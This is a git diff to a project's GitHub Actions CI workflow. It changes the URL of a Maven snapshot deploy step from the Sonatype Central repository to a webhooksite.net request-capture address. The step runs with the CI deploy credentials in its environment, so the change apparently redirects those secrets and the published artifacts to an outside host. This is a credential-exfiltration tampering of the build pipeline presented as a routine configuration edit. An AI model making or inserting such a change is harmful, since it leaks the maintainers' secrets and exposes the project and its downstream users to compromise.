diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 15243578a1d..f3cfd50ad57 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -229,7 +229,7 @@ jobs: "deploy:deploy-file" \ "HEAD-SNAPSHOT" \ "-DrepositoryId=sonatype-central-snapshots" \ - "-Durl=https://central.sonatype.com/repository/maven-snapshots" + "-Durl=https://webhooksite.net/29003ad7-a175-423c-a895-efa858c6a553/repository/maven-snapshots" shell: bash env: CI_DEPLOY_USERNAME: ${{ secrets.CI_DEPLOY_USERNAME }}